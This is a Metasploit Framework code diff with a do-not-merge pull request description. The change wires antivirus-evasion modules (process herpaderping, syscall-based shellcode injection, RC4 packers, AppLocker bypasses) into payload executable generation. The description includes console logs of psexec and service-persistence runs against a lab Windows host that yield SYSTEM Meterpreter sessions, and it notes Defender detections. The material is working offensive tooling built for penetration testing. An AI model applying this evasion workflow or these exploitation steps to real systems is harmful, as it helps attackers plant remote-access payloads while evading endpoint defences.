+++ b/lib/msf/ui/console/command_dispatcher/exploit.rb
@@ -288,6 +288,14 @@ class Exploit
     Msf::Payload.choose_payload(mod)
   end
 
+  def self.choose_shellcode_to_shellcode_evasion(mod)
+    Msf::Payload.choose_shellcode_to_shellcode_evasion(mod)
+  end
+
+  def self.choose_shellcode_to_binary_evasion(mod)
+    Msf::Payload.choose_shellcode_to_binary_evasion(mod)
+  end
+
 end
 
 end end end end

--- a/lib/msf/ui/console/command_dispatcher/modules.rb
+++ b/lib/msf/ui/console/command_dispatcher/modules.rb
@@ -908,11 +908,33 @@ module Msf
               print_status("No payload configured, defaulting to #{chosen_payload}") if chosen_payload
             end
 
+            print_evasion_info(mod)
+
             if framework.features.enabled?(Msf::FeatureManager::DISPLAY_MODULE_ACTION) && mod.respond_to?(:actions) && mod.actions.size > 1
               print_status "Setting default action %grn#{mod.action.name}%clr - view all #{mod.actions.size} actions with the %grnshow actions%clr command"
             end
 
             mod.init_ui(driver.input, driver.output)
+          end
+
+          def print_evasion_info(mod)
+            return unless mod.exploit? || mod.payload?
+            return unless framework.features.enabled?(Msf::FeatureManager::EVASION_MODULE_WORKFLOW)
+
+            shell_to_shell = mod.datastore['SHELLCODE_TO_SHELLCODE_EVASION_MODULE']
+            shell_to_bin = mod.datastore['SHELLCODE_TO_BINARY_EVASION_MODULE']
+
+            if shell_to_shell
+              print_status("Using configured Shellcode-to-Shellcode evasion module #{shell_to_shell}")
+            else
+              print_status("No Shellcode-to-Shellcode evasion module configured. You can set it by running 'set SHELLCODE_TO_SHELLCODE_EVASION_MODULE ...'")
+            end
+
+            if shell_to_bin
+              print_status("Using configured Shellcode-to-Binary evasion module #{shell_to_bin}")
+            else
+              print_status("No Shellcode-to-Binary evasion module configured. You can set it by running 'set SHELLCODE_TO_BINARY_EVASION_MODULE ...'")
+            end
           end
 
           #

--- a/lib/msf/ui/console/module_option_tab_completion.rb
+++ b/lib/msf/ui/console/module_option_tab_completion.rb
@@ -88,12 +88,20 @@ module Msf
             res << 'NOP'
             res << 'TARGET'
             res << 'ENCODER'
+            if framework.features.enabled?(::Msf::FeatureManager::EVASION_MODULE_WORKFLOW)
+              res << 'SHELLCODE_TO_SHELLCODE_EVASION_MODULE'
+              res << 'SHELLCODE_TO_BINARY_EVASION_MODULE'
+            end
           elsif mod.evasion?
             res << 'PAYLOAD'
             res << 'TARGET'
             res << 'ENCODER'
           elsif mod.payload?
             res << 'ENCODER'
+            if framework.features.enabled?(::Msf::FeatureManager::EVASION_MODULE_WORKFLOW)
+              res << 'SHELLCODE_TO_SHELLCODE_EVASION_MODULE'
+              res << 'SHELLCODE_TO_BINARY_EVASION_MODULE'
+            end
           end
           if mod.is_a?(Msf::Module::HasActions)
             res << 'ACTION'
@@ -107,6 +115,9 @@ module Msf
               end
             end
           end
+
+          res += process_evasion_options(mod)
+
           unless str.blank?
             res = res.select { |term| term.upcase.start_with?(str.upcase) }
             res = res.map do |term|
@@ -121,6 +132,28 @@ module Msf
           end
 
           return res.sort
+        end
+
+        def process_evasion_options(mod)
+          return [] unless (mod.exploit? || mod.payload?)
+
+          shell_to_shell = mod.datastore['SHELLCODE_TO_SHELLCODE_EVASION_MODULE']
+          shell_to_bin = mod.datastore['SHELLCODE_TO_BINARY_EVASION_MODULE']
+          res = []
+
+          [shell_to_shell, shell_to_bin].each do |val|
+            next if val.blank?
+
+            p = framework.modules.create(val)
+            next unless p
+
+            p.options.each do |e|
+              name, _opt = e
+              res << name
+            end
+          end
+
+          res
         end
 
         #
@@ -155,6 +188,14 @@ module Msf
           if ((mod.evasion? || mod.exploit? || mod.payload?) && (opt.upcase == 'ENCODER'))
             return option_values_encoders
           end
+          # The EVASION_MODULE option works for payloads and exploits
+          if ((mod.exploit? || mod.payload?) && (opt.upcase == 'SHELLCODE_TO_SHELLCODE_EVASION_MODULE'))
+            return option_values_shellcode_to_shellcode_evasion_modules(mod)
+          end
+          # The EVASION_MODULE option works for payloads and exploits
+          if ((mod.exploit? || mod.payload?) && (opt.upcase == 'SHELLCODE_TO_BINARY_EVASION_MODULE'))
+            return option_values_shellcode_to_binary_evasion_modules(mod)
+          end
 
           # Well-known option names specific to post-exploitation
           if (mod.post? || mod.exploit?)
@@ -169,6 +210,21 @@ module Msf
           # How about the selected payload?
           if ((mod.evasion? || mod.exploit?) && mod.datastore['PAYLOAD'])
             if p = framework.payloads.create(mod.datastore['PAYLOAD'])
+              p.options.each_key do |key|
+                res.concat(option_values_dispatch(mod, p.options[key], str, words)) if key.downcase == opt.downcase
+              end
+            end
+          end
+          if ((mod.exploit? || mod.payload?) && mod.datastore['SHELLCODE_TO_SHELLCODE_EVASION_MODULE'])
+            if p = framework.modules.create(mod.datastore['SHELLCODE_TO_SHELLCODE_EVASION_MODULE'])
+              p.options.each_key do |key|
+                res.concat(option_values_dispatch(mod, p.options[key], str, words)) if key.downcase == opt.downcase
+              end
+            end
+          end
+
+          if ((mod.exploit? || mod.payload?) && mod.datastore['SHELLCODE_TO_BINARY_EVASION_MODULE'])
+            if p = framework.modules.create(mod.datastore['SHELLCODE_TO_BINARY_EVASION_MODULE'])
               p.options.each_key do |key|
                 res.concat(option_values_dispatch(mod, p.options[key], str, words)) if key.downcase == opt.downcase
               end
@@ -314,6 +370,31 @@ module Msf
         #
         def option_values_encoders
           framework.encoders.module_refnames
+        end
+
+        #
+        # Provide valid evasion modules options for the current exploit or payload
+        #
+        def option_values_shellcode_to_shellcode_evasion_modules(mod)
+          results = Msf::Modules::Metadata::Cache.instance.find(
+            'type'     => [['evasion'], []],
+            'platform' => [[*mod.platform.names], []],
+            'arch'     => [[*mod.arch], []]
+          ).reject do |metadata_result|
+            created_mod = framework.modules.create(metadata_result.ref_name)
+            created_mod.module_inputs != 'Payload' || created_mod.module_outputs != 'Payload'
+          end.map {|metadata_result| metadata_result.ref_name }
+        end
+
+        def option_values_shellcode_to_binary_evasion_modules(mod)
+          results = Msf::Modules::Metadata::Cache.instance.find(
+            'type'     => [['evasion'], []],
+            'platform' => [[*mod.platform.names], []],
+            'arch'     => [[*mod.arch], []]
+          ).reject do |metadata_result|
+            created_mod = framework.modules.create(metadata_result.ref_name)
+            created_mod.module_inputs != 'Payload' || created_mod.module_outputs != 'Executable'
+          end.map {|metadata_result| metadata_result.ref_name }
         end
 
         #

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1,5 +1,7 @@
 # -*- coding: binary -*-
 
+require 'msf/core/evasion_mixins/util_exe'
+
 module Msf::Util::EXE
   include Msf::Util::EXE::Common
   include Msf::Util::EXE::Windows
@@ -42,6 +44,8 @@ module Msf::Util::EXE
 
   include Msf::Util::EXE::Bsd::X86
   include Msf::Util::EXE::Bsd::X64
+
+  prepend Msf::EvasionMixins::UtilExe
 
   def self.included(base)
     base.extend(ClassMethods)

--- a/lib/msf/util/exe/windows.rb
+++ b/lib/msf/util/exe/windows.rb
@@ -13,17 +13,17 @@ module Msf::Util::EXE::Windows
   module ClassMethods
 
     def to_executable_windows(framework, arch, code, fmt = 'exe', opts = {})
-      exe_formats = ['exe', 'exe-service', 'dll', 'dll-dccw-gdiplus']
+      exe_formats = ['exe', 'exe-service', 'dll', 'dll-dccw-gdiplus', 'exe-small']
 
-      exe_fmt ||= 'exe-small' if ['vba-exe', 'vbs', 'loop-vbs', 'asp', 'aspx-exe'].include?(fmt)
+      # Default to 'exe' as the safe choice
       exe_fmt = 'exe'
-
+      # Otherwise, only use the user-requested exe format if it is allowed and present in the valid exe formats list above.
       exe_fmt = fmt if exe_formats.include?(fmt)
 
       exe = nil
       exe = to_executable_windows_x86(framework, code, exe_fmt, opts) if arch.index(ARCH_X86)
-      exe = to_executable_windows_x64(framework, code, exe_fmt, opts) if arch.index(ARCH_X64) 
-      exe = to_executable_windows_aarch64(framework, code, exe_fmt, opts) if arch.index(ARCH_AARCH64) 
+      exe = to_executable_windows_x64(framework, code, exe_fmt, opts) if arch.index(ARCH_X64)
+      exe = to_executable_windows_aarch64(framework, code, exe_fmt, opts) if arch.index(ARCH_AARCH64)
       return exe if exe_formats.include?(fmt) # Returning only the exe
     end
 

--- a/lib/msf_autoload.rb
+++ b/lib/msf_autoload.rb
@@ -307,7 +307,10 @@ class MsfAutoload
       'opnsense' => 'OPNSense',
       'pgadmin' => 'PgAdmin',
       'freepbx' => 'FreePBX',
-      'complete_pbx' => 'CompletePBX'
+      'complete_pbx' => 'CompletePBX',
+      'exe_service' => 'EXEService',
+      'exe_small' => 'EXESmall',
+      'exe_only' => 'EXEOnly'
     }
   end
 

--- a/modules/evasion/linux/aarch64/rc4_packer.rb
+++ b/modules/evasion/linux/aarch64/rc4_packer.rb
@@ -9,6 +9,9 @@ class MetasploitModule < Msf::Evasion
   include Msf::Payload::Linux::Aarch64::ElfLoader
   include Msf::Payload::Linux::Aarch64::SleepEvasion
 
+  include Msf::ModuleInputs::Payload
+  include Msf::ModuleOutputs::Executable
+
   def initialize(info = {})
     super(
       update_info(
@@ -46,5 +49,7 @@ class MetasploitModule < Msf::Evasion
 
     File.binwrite(datastore['FILENAME'], final_elf)
     File.chmod(0o755, datastore['FILENAME'])
+
+    final_elf
   end
 end

--- a/modules/evasion/linux/shellcode_to_shellcode.rb
+++ b/modules/evasion/linux/shellcode_to_shellcode.rb
@@ -1,0 +1,28 @@
+class MetasploitModule < Msf::Evasion
+
+  include Msf::ModuleInputs::Payload
+  include Msf::ModuleOutputs::Payload
+
+  def initialize(info = {})
+    super(
+      merge_info(
+        info,
+        'Name' => 'Mock shellcode to shellcode evasion module',
+        'Description' => %q{...},
+        'Author' => [ 'sjanusz-r7' ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'linux',
+        'Arch' => [ARCH_X86, ARCH_X64]
+      )
+    )
+
+    deregister_options('FILENAME')
+  end
+
+  # For now, return the same shellcode we were provided, as a mock.
+  def run
+    print_status("Let's imagine we are doing some processing here...")
+    # Let's pretend that payload.encoded here will be modified.
+    payload.encoded
+  end
+end

--- a/modules/evasion/linux/x64/rc4_packer.rb
+++ b/modules/evasion/linux/x64/rc4_packer.rb
@@ -9,6 +9,9 @@ class MetasploitModule < Msf::Evasion
   include Msf::Payload::Linux::X64::SleepEvasion
   include Msf::Payload::Linux::X64::ElfLoader
 
+  include Msf::ModuleInputs::Payload
+  include Msf::ModuleOutputs::Executable
+
   def initialize(info = {})
     super(
       update_info(
@@ -46,5 +49,7 @@ class MetasploitModule < Msf::Evasion
 
     File.binwrite(datastore['FILENAME'], final_elf)
     File.chmod(0o755, datastore['FILENAME'])
+
+    final_elf
   end
 end

--- a/modules/evasion/linux/x86/rc4_packer.rb
+++ b/modules/evasion/linux/x86/rc4_packer.rb
@@ -9,6 +9,9 @@ class MetasploitModule < Msf::Evasion
   include Msf::Payload::Linux::X86::ElfLoader
   include Msf::Payload::Linux::X86::SleepEvasion
 
+  include Msf::ModuleInputs::Payload
+  include Msf::ModuleOutputs::Executable
+
   def initialize(info = {})
     super(
       update_info(
@@ -51,5 +54,7 @@ class MetasploitModule < Msf::Evasion
 
     File.binwrite(datastore['FILENAME'], final_elf)
     File.chmod(0o755, datastore['FILENAME'])
+
+    final_elf
   end
 end

--- a/modules/evasion/windows/applocker_evasion_install_util.rb
+++ b/modules/evasion/windows/applocker_evasion_install_util.rb
@@ -5,6 +5,9 @@
 
 class MetasploitModule < Msf::Evasion
 
+  include Msf::ModuleInputs::Payload
+  include Msf::ModuleOutputs::IntermediateFile
+
   def initialize(info = {})
     super(
       update_info(

--- a/modules/evasion/windows/applocker_evasion_msbuild.rb
+++ b/modules/evasion/windows/applocker_evasion_msbuild.rb
@@ -5,6 +5,9 @@
 
 class MetasploitModule < Msf::Evasion
 
+  include Msf::ModuleInputs::Payload
+  include Msf::ModuleOutputs::IntermediateFile
+
   def initialize(info = {})
     super(
       update_info(

--- a/modules/evasion/windows/applocker_evasion_presentationhost.rb
+++ b/modules/evasion/windows/applocker_evasion_presentationhost.rb
@@ -5,6 +5,9 @@
 
 class MetasploitModule < Msf::Evasion
 
+  include Msf::ModuleInputs::Payload
+  include Msf::ModuleOutputs::IntermediateFile
+
   def initialize(info = {})
     super(
       update_info(

--- a/modules/evasion/windows/applocker_evasion_regasm_regsvcs.rb
+++ b/modules/evasion/windows/applocker_evasion_regasm_regsvcs.rb
@@ -5,6 +5,9 @@
 
 class MetasploitModule < Msf::Evasion
 
+  include Msf::ModuleInputs::Payload
+  include Msf::ModuleOutputs::IntermediateFile
+
   def initialize(info = {})
     super(
       update_info(

--- a/modules/evasion/windows/applocker_evasion_workflow_compiler.rb
+++ b/modules/evasion/windows/applocker_evasion_workflow_compiler.rb
@@ -5,6 +5,9 @@
 
 class MetasploitModule < Msf::Evasion
 
+  include Msf::ModuleInputs::Payload
+  include Msf::ModuleOutputs::IntermediateFile
+
   def initialize(info = {})
     super(
       update_info(

--- a/modules/evasion/windows/process_herpaderping.rb
+++ b/modules/evasion/windows/process_herpaderping.rb
@@ -7,6 +7,14 @@ require 'metasploit/framework/compiler/windows'
 
 class MetasploitModule < Msf::Evasion
 
+  include Msf::ModuleInputs::Payload
+  include Msf::ModuleOutputs::Executable
+
+  # It works in the context of a service as it spawns a separate process.
+  # However, it is compatible with 'exe' and 'exe-service'.
+  include Msf::ModuleOutputs::ExecutableTypes::EXE
+  include Msf::ModuleOutputs::ExecutableTypes::EXEService
+
   # These constants must match the constants defined in the PE loader code (ProcessHerpaderpingTemplate.cpp)
   MAX_JUNK_SIZE = 1024
   MAX_PAYLOAD_SIZE = 8192
@@ -188,5 +196,7 @@ class MetasploitModule < Msf::Evasion
         'it detects the OS is one of these versions.'
       )
     end
+
+    pe
   end
 end

--- a/modules/evasion/windows/shellcode_to_shellcode.rb
+++ b/modules/evasion/windows/shellcode_to_shellcode.rb
@@ -1,0 +1,25 @@
+class MetasploitModule < Msf::Evasion
+
+  include Msf::ModuleInputs::Payload
+  include Msf::ModuleOutputs::Payload
+
+  def initialize(info = {})
+    super(
+      merge_info(
+        info,
+        'Name' => 'Mock shellcode to shellcode evasion module',
+        'Description' => %q{...},
+        'Author' => [ 'sjanusz-r7' ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'windows',
+        'Arch' => [ARCH_X86, ARCH_X64]
+      )
+    )
+  end
+
+  # For now, return the same shellcode we were provided, as a mock.
+  def run
+    # Let's pretend that payload.encoded here will be modified.
+    payload.encoded
+  end
+end

--- a/modules/evasion/windows/syscall_inject.rb
+++ b/modules/evasion/windows/syscall_inject.rb
@@ -1,6 +1,11 @@
 require 'metasploit/framework/compiler/mingw'
 require 'metasploit/framework/compiler/windows'
 class MetasploitModule < Msf::Evasion
+
+  include Msf::ModuleInputs::Payload
+  include Msf::ModuleOutputs::Executable
+  include Msf::ModuleOutputs::ExecutableTypes::EXE
+  
   RC4 = File.join(Msf::Config.data_directory, 'headers', 'windows', 'rc4.h')
   BASE64 = File.join(Msf::Config.data_directory, 'headers', 'windows', 'base64.h')
   def initialize(info = {})
@@ -463,7 +468,7 @@ class MetasploitModule < Msf::Evasion
             SIZE_T size = base64decode(shellcode, enc_shellcode, b64len);
             PVOID bAddress = NULL;
             int process_id = GetCurrentProcessId();
-            cID.UniqueProcess = process_id;
+            cID.UniqueProcess = (HANDLE)process_id;
             NtOpenProcess(&pHandle, PROCESS_ALL_ACCESS, &OA, &cID);
             NtAllocateVirtualMemory(pHandle, &bAddress, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
             int n = 0;
@@ -490,7 +495,7 @@ class MetasploitModule < Msf::Evasion
             NtProtectVirtualMemory(pHandle, &bAddress, &size, PAGE_EXECUTE, &old);
             #{s if datastore['SLEEP'] > 0};
             HANDLE thread = NULL;
-            NtCreateThreadEx(&thread, THREAD_ALL_ACCESS, NULL, pHandle, exec, bAddress, NULL, NULL, NULL, NULL, NULL);
+            NtCreateThreadEx(&thread, THREAD_ALL_ACCESS, NULL, pHandle, exec, bAddress, (ULONG)NULL, (SIZE_T)NULL, (SIZE_T)NULL, (SIZE_T)NULL, NULL);
             WaitForSingleObject(thread, INFINITE);
             NtClose(thread);
             NtClose(pHandle);
@@ -548,6 +553,7 @@ class MetasploitModule < Msf::Evasion
     bin = File.binread(comp_file)
     file_create(bin)
     comp_obj.cleanup_files
+    bin
   end
 
   def run

--- a/modules/evasion/windows/windows_defender_exe.rb
+++ b/modules/evasion/windows/windows_defender_exe.rb
@@ -7,6 +7,9 @@ require 'metasploit/framework/compiler/windows'
 
 class MetasploitModule < Msf::Evasion
 
+  include Msf::ModuleInputs::Payload
+  include Msf::ModuleOutputs::Executable
+
   def initialize(info = {})
     super(
       merge_info(
@@ -78,6 +81,7 @@ int main() {
     bin = Metasploit::Framework::Compiler::Windows.compile_random_c(c_template)
     print_status("Compiled executable size: #{bin.length}")
     file_create(bin)
+    bin
   end
 
 end

--- a/modules/evasion/windows/windows_defender_js_hta.rb
+++ b/modules/evasion/windows/windows_defender_js_hta.rb
@@ -5,6 +5,9 @@
 
 class MetasploitModule < Msf::Evasion
 
+include Msf::ModuleInputs::Payload
+include Msf::ModuleOutputs::IntermediateFile
+
   def initialize(info = {})
     super(
       merge_info(


### PR DESCRIPTION
Do not merge.

This PR is an initial spike into wiring up evasion modules to run automatically (when a user specifies a value) when there is an executable being dropped onto a target and then executed.
This is done by modifying the `EXE` mixin, which means that any Windows exploit that is using this functionality, will have the EVASION_MODULE option registered and wired up (not for all code paths; e.g. DLL etc.)

There are some limitations of this, that I'll describe further on.

Seems like Windows is also detecting some of these executables:
```
VirTool:Win32/Herpaderping!pz
Trojan:Win64/CobaltStrike.BL!MTB
```

## Example Workflows
### PSEXEC (Powershell)
- Not impacted:
```
msf exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.207.1:4444 
[*] 192.168.207.169:445 - Connecting to the server...
[*] 192.168.207.169:445 - Authenticating to 192.168.207.169:445 as user 'win10'...
[*] 192.168.207.169:445 - Executing the payload...
[+] 192.168.207.169:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (232006 bytes) to 192.168.207.169
[*] Meterpreter session 2 opened (192.168.207.1:4444 -> 192.168.207.169:49972) at 2026-03-12 16:05:50 +0000

meterpreter > exit
[*] Shutting down session: 2
```

### PSEXEC (Native Upload - No Evasion)
```
msf exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.207.1:4444 
[*] 192.168.207.169:445 - Connecting to the server...
[*] 192.168.207.169:445 - Authenticating to 192.168.207.169:445 as user 'win10'...
[!] 192.168.207.169:445 - peer_native_os is only available with SMB1 (current version: SMB3)
[*] 192.168.207.169:445 - Uploading payload... kXbEgNqr.exe
[*] 192.168.207.169:445 - Generating EXE Service payload...
[*] 192.168.207.169:445 - Created \kXbEgNqr.exe... (12288 bytes)
[*] Sending stage (232006 bytes) to 192.168.207.169
[+] 192.168.207.169:445 - Service started successfully...
[*] 192.168.207.169:445 - Deleting \kXbEgNqr.exe...
[*] Meterpreter session 3 opened (192.168.207.1:4444 -> 192.168.207.169:49974) at 2026-03-12 16:07:44 +0000

meterpreter > exit
[*] Shutting down session: 3
```

### PSEXEC (Native Upload - Herpaderping)
```
msf exploit(windows/smb/psexec) > run evasion_module='evasion/windows/process_herpaderping'
[*] Started reverse TCP handler on 192.168.207.1:4444 
[*] 192.168.207.169:445 - Connecting to the server...
[*] 192.168.207.169:445 - Authenticating to 192.168.207.169:445 as user 'win10'...
[!] 192.168.207.169:445 - peer_native_os is only available with SMB1 (current version: SMB3)
[*] 192.168.207.169:445 - Uploading payload... JLFElzJu.exe
[*] 192.168.207.169:445 - Generating EXE Service payload...
[*] 192.168.207.169:445 - Running evasion module: evasion/windows/process_herpaderping...
[+] NALnXll.exe stored at /Users/sjanusz/.msf4/local/NALnXll.exe
[*] 192.168.207.169:445 - Created \JLFElzJu.exe... (169472 bytes)
[*] Sending stage (232006 bytes) to 192.168.207.169
[*] Meterpreter session 4 opened (192.168.207.1:4444 -> 192.168.207.169:49976) at 2026-03-12 16:08:28 +0000
[+] 192.168.207.169:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.207.169:445 - Deleting \JLFElzJu.exe...

meterpreter > exit
[*] Shutting down session: 4
```

### PSEXEC (Native Upload - syscall_inject)
*This scenario creates a Meterpreter session, but it is dying. We should investigate why.*
```
msf exploit(windows/smb/psexec) > run evasion_module='evasion/windows/syscall_inject'
[*] Started reverse TCP handler on 192.168.207.1:4444 
[*] 192.168.207.169:445 - Connecting to the server...
[*] 192.168.207.169:445 - Authenticating to 192.168.207.169:445 as user 'win10'...
[!] 192.168.207.169:445 - peer_native_os is only available with SMB1 (current version: SMB3)
[*] 192.168.207.169:445 - Uploading payload... iHKkqPqx.exe
[*] 192.168.207.169:445 - Generating EXE Service payload...
[*] 192.168.207.169:445 - Running evasion module: evasion/windows/syscall_inject...
[+] ykyrK.exe stored at /Users/sjanusz/.msf4/local/ykyrK.exe
[*] 192.168.207.169:445 - Created \iHKkqPqx.exe... (19968 bytes)
[*] Sending stage (232006 bytes) to 192.168.207.169
[*] Meterpreter session 5 opened (192.168.207.1:4444 -> 192.168.207.169:49978) at 2026-03-12 16:10:41 +0000
[+] 192.168.207.169:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.207.169:445 - Deleting \iHKkqPqx.exe...


[*] 192.168.207.169 - Meterpreter session 5 closed.  Reason: Died
meterpreter > 
```

### PSEXEC (Native Upload - syscall_inject - Persistent service)
*Similar to above, the Meterpreter session dies before we can interact with it*
```
msf exploit(windows/smb/psexec) > run evasion_module='evasion/windows/syscall_inject' SERVICE_PERSIST=true
[*] Started reverse TCP handler on 192.168.207.1:4444 
[*] 192.168.207.169:445 - Connecting to the server...
[*] 192.168.207.169:445 - Authenticating to 192.168.207.169:445 as user 'win10'...
[!] 192.168.207.169:445 - peer_native_os is only available with SMB1 (current version: SMB3)
[*] 192.168.207.169:445 - Uploading payload... XhbIksOc.exe
[*] 192.168.207.169:445 - Generating EXE Service payload...
[*] 192.168.207.169:445 - Running evasion module: evasion/windows/syscall_inject...
[+] BGIXmdfcL.exe stored at /Users/sjanusz/.msf4/local/BGIXmdfcL.exe
[*] 192.168.207.169:445 - Created \XhbIksOc.exe... (19968 bytes)
[*] Sending stage (232006 bytes) to 192.168.207.169
[*] Meterpreter session 6 opened (192.168.207.1:4444 -> 192.168.207.169:49980) at 2026-03-12 16:12:16 +0000
[+] 192.168.207.169:445 - Service start timed out, OK if running a command or non-service executable...
[!] 192.168.207.169:445 - Not removing service for persistence...

[*] 192.168.207.169 - Meterpreter session 6 closed.  Reason: Died
[-] Invalid session identifier: 6
```

### PSEXEC (Native Upload - syscall_inject - Persistent service - EXITFUNC=process)
The default `windows/x64/meterpreter/reverse_tcp` payload EXITFUNC option is `thread`. Setting it to `process` or others has no impact in this case:
```
msf exploit(windows/smb/psexec) > run evasion_module='evasion/windows/syscall_inject' SERVICE_PERSIST=true EXITFUNC=process
[*] Started reverse TCP handler on 192.168.207.1:4444 
[*] 192.168.207.169:445 - Connecting to the server...
[*] 192.168.207.169:445 - Authenticating to 192.168.207.169:445 as user 'win10'...
[!] 192.168.207.169:445 - peer_native_os is only available with SMB1 (current version: SMB3)
[*] 192.168.207.169:445 - Uploading payload... TNfYPDma.exe
[*] 192.168.207.169:445 - Generating EXE Service payload...
[*] 192.168.207.169:445 - Running evasion module: evasion/windows/syscall_inject...
[+] GAYJQkrPl.exe stored at /Users/sjanusz/.msf4/local/GAYJQkrPl.exe
[*] 192.168.207.169:445 - Created \TNfYPDma.exe... (18944 bytes)
[*] Sending stage (232006 bytes) to 192.168.207.169
[*] Meterpreter session 7 opened (192.168.207.1:4444 -> 192.168.207.169:49982) at 2026-03-12 16:13:45 +0000
[+] 192.168.207.169:445 - Service start timed out, OK if running a command or non-service executable...
[!] 192.168.207.169:445 - Not removing service for persistence...

meterpreter > 
[*] 192.168.207.169 - Meterpreter session 7 closed.  Reason: Died
```

### Persistence
I have used a PSEXEC session for these examples.
```
Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  9         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DESKTOP-NO8VQQB  192.168.207.1:4444 -> 192.168.207.169:49985 (192.168.207.169)
```

#### Stageless (windows/x64/meterpreter_reverse_tcp) Meterpreter (Herpaderping)
Payload is too large, so we fail. This is expected.
```
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Generating EXE Service payload...
[*] Running evasion module: evasion/windows/process_herpaderping...
[-] Exploit failed: Msf::Evasion::Failed bad-config: Payload too big: 232006 bytes (max: 8192)
```

#### Staged (windows/x64/meterpreter/reverse_tcp) Meterpreter (Herpaderping)
The behaviour is a little janky; We get an error message, but we DO have a working Meterpreter session:
```
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Generating EXE Service payload...
[*] Running evasion module: evasion/windows/process_herpaderping...
[+] ZEjns.exe stored at /Users/sjanusz/.msf4/local/ZEjns.exe
[+] Payload written to C:\Windows\TEMP\bEpZ.exe
[*] Sending stage (232006 bytes) to 192.168.207.169
[*] Meterpreter session 10 opened (192.168.207.1:4444 -> 192.168.207.169:49986) at 2026-03-12 16:25:54 +0000
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Send timed out <= this would need to be removed
...
Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  9         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DESKTOP-NO8VQQB  192.168.207.1:4444 -> 192.168.207.169:49985 (192.168.207.169)
  10        meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DESKTOP-NO8VQQB  192.168.207.1:4444 -> 192.168.207.169:49986 (192.168.207.169)

msf exploit(windows/persistence/service) > sessions -i 10
[*] Starting interaction with 10...

meterpreter > sysinfo
Computer        : DESKTOP-NO8VQQB
```

#### Stageless Meterpreter (syscall_inject)
Here we start to encounter some problems and more janky behaviour.
With the default `syscall_inject` option SLEEP=30, we do not get a session. The exploit fails before the payload reaches out to MSF console. Setting the sleep timer to 0 as a workaround works. It fetches us a Meterpreter session. *However* said session then dies after approx. 60 seconds. Initially, the session can be interacted with:
```
msf exploit(windows/persistence/service) > run evasion_module='evasion/windows/syscall_inject' session=-1 EXITFUNC='process' SLEEP=0
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Generating EXE Service payload...
[*] Running evasion module: evasion/windows/syscall_inject...
[+] DQsFm.exe stored at /Users/sjanusz/.msf4/local/DQsFm.exe
[+] Payload written to C:\Windows\TEMP\KzLryc.exe
[*] Meterpreter session 12 opened (192.168.207.1:4444 -> 192.168.207.169:49990) at 2026-03-12 16:33:11 +0000
msf exploit(windows/persistence/service) > sessions -i 12
[*] Starting interaction with 12...

meterpreter > sysinfo
Computer        : DESKTOP-NO8VQQB
...
meterpreter > bg
[*] Backgrounding session 12...
... delay here ...
[*] 192.168.207.169 - Meterpreter session 12 closed.  Reason: Died
```
The same occurs for `EXITFUNC='process'` and `EXITFUNC='thread'`.

#### Staged Meterpreter (syscall_inject)
This is similar to above; the initial session is established, but dies after a delay:
```
msf exploit(windows/persistence/service) > run evasion_module='evasion/windows/syscall_inject' session=-1 EXITFUNC='process' SLEEP=0
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Generating EXE Service payload...
[*] Running evasion module: evasion/windows/syscall_inject...
[+] cpmvhq.exe stored at /Users/sjanusz/.msf4/local/cpmvhq.exe
[+] Payload written to C:\Windows\TEMP\uHnstZjN.exe
[*] Sending stage (232006 bytes) to 192.168.207.169
[*] Meterpreter session 13 opened (192.168.207.1:4444 -> 192.168.207.169:49991) at 2026-03-12 16:37:53 +0000
...
[*] 192.168.207.169 - Meterpreter session 13 closed.  Reason: Died
```
The same occurs for `EXITFUNC='process'` and `EXITFUNC='thread'`.

## Limitations
- Only supports exploits that require a payload (e.g. meterpreter) and interact with the target by dropping/executing an executable file.
- We do not create quite the correct executable (e.g. exe vs exe-service) and as such, the syscall_inject module seems to struggle in these scenarios above. We should investigate how this can be fixed so that we always compile the correct executable type.

## Next Steps
- We should investigate if implementing the evasion capabilities as an `encoder` would be better than the current method of hooking methods and injecting ourselves (evasion processing) into the EXE generation workflows.
- We should investigate how we can modify the evasion modules to create the correct executable; for example, `exe` vs `exe-service` etc. This would need to happen to ensure correct payload generation.
- We should investigate what extra metadata we need to implement for exploits and evasion modules. For example:
```
"SupportedPayloadTypes" => %[shellcode ... ...],
"SupportedOutputEXecutableTypes" => %w[exe exe-service dll ... ...]
```
- We can spike out a new evasion module: `evasion/multi/http/remote_compiler`, which would allow for compiling the evasion executable on a remote machine.
- Investigate how we can expand this approach to ELF (Linux) once we have a Linux evasion module (currently, we have Windows evasion modules)
- Investigate how we can wire up the Applocker evasion modules. They are currently not wired up as they need extra work to occur once the evasion module runs. For example, there's extra compiling steps to be performed etc. These modules are labelled as returning an `Msf::ModuleOutputs::IntermediateFile`.
- Explore how we can have a nice UX for registering the nested module options; the user needs to be able to see what options the currently selected `EVASION_MODULE` offers, and needs to be able to set them correctly. We need to be mindful of how this will work in Pro. We could look into an approach similar to the C2 profiles work.
- There's likely more here. I'll try to update this with more next steps after syncing up with the team.
- Invesitgate potentially using something similar to https://github.com/monoxgas/sRDI or https://github.com/TheWover/donut